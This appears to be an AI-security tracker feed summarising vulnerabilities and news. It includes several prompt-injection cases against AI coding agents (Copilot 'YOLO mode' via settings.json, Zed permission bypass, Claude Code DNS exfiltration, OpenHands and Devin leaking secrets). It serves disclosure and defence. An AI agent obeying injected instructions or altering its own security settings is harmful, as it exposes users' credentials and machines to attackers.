All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
N/A -- This content is a navigation menu and feature listing from GitHub's Release 4.9.1 page, not a description of a security issue, vulnerability, or AI/LLM problem.
GitHub Copilot and VS Code are vulnerable to prompt injection (tricking an AI by hiding instructions in its input) that allows an attacker to achieve RCE (remote code execution, where an attacker can run commands on a system they don't own) by modifying a project's settings.json file to put Copilot into 'YOLO mode'. This vulnerability demonstrates a broader security risk: if an AI agent can write to files and modify its own configuration or security settings, it can be exploited for full system compromise.
CVE-2025-53773 is a command injection vulnerability (a flaw where special characters in user input are not properly filtered, allowing an attacker to run unauthorized commands) found in GitHub Copilot and Visual Studio that lets an unauthorized attacker execute code on a user's local computer. The vulnerability exploits improper handling of special elements in commands, potentially through prompt injection (tricking the AI by hiding malicious instructions in its input).
OpenAI released GPT-5, a system combining two models: a fast base model for creative tasks and a reasoning model for coding and math, which routes queries appropriately based on user input. GPT-5 achieves state-of-the-art performance on several benchmarks and significantly reduces hallucinations (false information generation) compared to previous models, particularly helping with healthcare applications where accuracy matters. However, GPT-5 is best understood as consolidating features from models released since GPT-4 rather than a major leap forward, and it doesn't lead on all benchmarks.
Zed, a multiplayer code editor, had a vulnerability before version 0.197.3 where an AI agent could bypass permission checks and achieve RCE (remote code execution, where an attacker can run commands on a system they don't own) by creating or modifying configuration files without user approval. This allowed the AI agent to execute arbitrary commands on a victim's machine.
ModelCache for LLM through version 0.2.0 contains a deserialization vulnerability (a flaw where untrusted data is converted back into code objects, potentially allowing attackers to run malicious code) in the /manager/data_manager.py component that allows attackers to execute arbitrary code by supplying specially crafted data.
CVE-2025-8747 is a safe mode bypass vulnerability in Keras (a machine learning library) versions 3.0.0 through 3.10.0 that allows an attacker to run arbitrary code (execute any commands they want) on a user's computer by tricking them into loading a specially designed `.keras` model file. The vulnerability has a CVSS score (severity rating) of 8.6, indicating it is a high-risk security problem.
Claude Code, a feature in Anthropic's Claude AI, had a high severity vulnerability (CVE-2025-55284) that allowed attackers to use prompt injection (tricking an AI by hiding instructions in its input) to hijack the system and steal sensitive information like API keys by sending DNS requests (network queries that reveal data to external servers). The vulnerability affected developers who reviewed untrusted code or processed external data, as attackers could make Claude Code run bash commands (low-level system commands) without user permission to leak secrets.
The EU Whistleblowing Directive (2019) protects people who report violations of EU law, including violations of the EU AI Act starting August 2, 2026, by requiring organizations to set up reporting channels and prohibiting retaliation against whistleblowers. Whistleblowers can report internally within their organization, to government authorities, or publicly in certain urgent situations, and various institutions offer free legal and technical support to help protect them.
OpenHands, a popular AI agent from All Hands AI that can now run as a cloud service, is vulnerable to prompt injection (tricking an AI by hiding instructions in its input) when processing untrusted data like content from websites. This vulnerability allows attackers to hijack the system and compromise its confidentiality, integrity, and availability, potentially leading to full system compromise.
The skops Python library (used for sharing scikit-learn machine learning models) has a security flaw in versions 0.12.0 and earlier where the Card.get_model function can accidentally use joblib (a less secure loading method) instead of skops' safer approach. Joblib allows arbitrary code execution (running any code during model loading), which could let attackers run malicious code if they trick users into loading a specially crafted model file. This bypasses the security checks that skops normally provides.
CVE-2025-53767 is a vulnerability in Azure OpenAI that allows elevation of privilege, which means an attacker could gain higher-level access than they should have. The vulnerability stems from server-side request forgery (SSRF, a flaw where an attacker tricks a server into making unintended requests on their behalf). The CVSS severity score and detailed impact information have not yet been assessed by NIST.
CVE-2025-53787 is an information disclosure vulnerability in Microsoft 365 Copilot BizChat that stems from improper neutralization of special elements used in commands (command injection, where attackers manipulate input to execute unintended commands). The vulnerability allows unauthorized access to sensitive information, though specific attack details are not provided in this source.
CVE-2025-53774 is an information disclosure vulnerability in Microsoft 365 Copilot BizChat caused by improper neutralization of special elements used in commands (command injection, where attackers craft malicious input to execute unintended commands). The vulnerability allows unauthorized access to sensitive information, though the severity rating has not yet been assigned by the National Institute of Standards and Technology.
Ollama v0.1.33 has a vulnerability (CVE-2025-44779) that allows attackers to delete arbitrary files (any files on a system) by sending a specially crafted request to the /api/pull endpoint. The vulnerability stems from improper input validation (the software not properly checking user input for malicious content) and overly permissive file access settings.
CVE-2025-23335 is a vulnerability in NVIDIA Triton Inference Server (a tool that runs AI models on servers) for Windows and Linux where an attacker could trigger an integer underflow (a math error where a number wraps around to a very large value) using a specially crafted model setup and input, potentially causing a denial of service (making the system crash or become unavailable).
Fix: This vulnerability has been patched in version 0.197.3. As a workaround, users can either avoid sending prompts to the Agent Panel or limit the AI Agent's file system access.
NVD/CVE DatabaseFix: Anthropic fixed the vulnerability in early June.
Embrace The RedOpenHands, an AI agent tool created by All-Hands AI, has a vulnerability where it can render images in chat conversations, which attackers can exploit through prompt injection (tricking an AI by hiding instructions in its input) to leak access tokens (security credentials that grant permission to use services) without requiring user interaction. This type of attack has been called the 'Lethal Trifecta' and represents a significant data exfiltration (unauthorized data theft) risk.
This content discusses security challenges in agentic AI (AI systems that can act autonomously and use tools), emphasizing that generic jailbreak testing (attempts to trick AI into ignoring safety guidelines) misses real operational risks like tool misuse and data theft. The articles highlight that enterprises need contextual red teaming (security testing that simulates realistic attack scenarios relevant to how the AI will actually be used) and governance frameworks like identity controls and boundaries to secure autonomous AI systems.
Devin AI has a tool called expose_port that can publish local computer ports to the public internet, intended for testing websites during development. However, attackers can use prompt injection (tricking an AI by hiding instructions in its input) to manipulate Devin into exposing sensitive files and creating backdoor access without human approval, as demonstrated through a multi-stage attack that gradually steers the AI toward malicious actions.
Fix: This issue is fixed in version 0.13.0. Users should upgrade to skops version 0.13.0 or later.
NVD/CVE DatabaseDevin AI can be tricked into leaking sensitive information to attackers through multiple methods, including using its Shell tool to run data-stealing commands, using its Browser tool to send secrets to attacker-controlled websites, rendering images from untrusted domains, and posting hidden data to connected services like Slack. These attacks work because Devin has unrestricted internet access and can be manipulated through indirect prompt injection (tricking an AI by hiding malicious instructions in its input), where attackers embed instructions in places like GitHub issues that Devin investigates.